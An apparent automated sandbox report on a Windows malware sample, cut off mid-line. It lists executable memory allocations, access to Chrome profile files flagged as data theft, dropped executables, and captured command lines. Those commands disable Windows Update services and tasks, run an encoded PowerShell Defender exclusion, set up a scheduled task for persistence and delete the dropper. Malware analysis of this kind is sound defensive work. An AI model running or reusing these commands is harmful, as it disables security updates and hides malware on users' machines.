NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a4000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9491a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9492c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe949cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe949f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe949d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000013f5e2000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94a41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000013f5e0000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000013f5e0000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000013f5e0000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000013f5e4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000013f5e4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000013f5e4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000013f5e4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000013f5e4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000013f5e4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000013f5e4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000013f5e4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000013f5e4000 process_handle: 0xffffffffffffffff	1

Steals private information from local Internet browsers (50 out of 518 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ko
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\pt_PT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\pl
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\da
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\uk
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fil
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\de
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\el
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\da
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sl
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\ta
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sk
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\th
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\tr
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sv
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\nb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ko
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\JumpListIconsRecentClosed
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\ru
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Download Service
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\ro
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\bg
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\zh_CN
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ms
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\ko
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\kn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\km
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\uk
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\ar
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\ka
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\lv
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\0.57.44.2492\_platform_specific\x86_64
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\es
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\hi
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\hu
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ja
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\en
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\el
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\fil
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\bn

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe
file	C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe

Creates a shortcut to an executable file (1 event)

file	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (19 events)

cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsAutHost"
cmdline	SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
cmdline	SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
cmdline	SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
cmdline	SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
cmdline	cmd /c schtasks /run /tn "WindowsAutHost"
cmdline	"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
cmdline	SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
cmdline	cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
cmdline	powershell -EncodedCommand "PAAjAHIAZgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbQB2ACMAPgAgAEAAKAAgADwAIwBpAGIAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGEAZQBnACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAHYAawB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAegAjAD4A"
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\test22\AppData\Roaming\WindowsServices\WindowsAutHost\""
cmdline	"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
cmdline	"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe"
cmdline	SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\test22\AppData\Roaming\WindowsServices\WindowsAutHost\""
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbQB2ACMAPgAgAEAAKAAgADwAIwBpAGIAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGEAZQBnACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAHYAawB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAegAjAD4A"
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\test22\AppData\Roaming\WindowsServices\WindowsAutHost\""
cmdline	SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
cmdline	schtasks /run /tn "WindowsAutHost"

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe
file	C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe

A process created a hidden window (6 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Aug. 31, 2022, 9:57 a.m.	show_type: 0 filepath_r: powershell parameters: -EncodedCommand "PAAjAHIAZgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbQB2ACMAPgAgAEAAKAAgADwAIwBpAGIAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGEAZQBnACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAHYAawB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAegAjAD4A" filepath: powershell	1	1
ShellExecuteExW Aug. 31, 2022, 9:57 a.m.	show_type: 0 filepath_r: cmd parameters: /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN 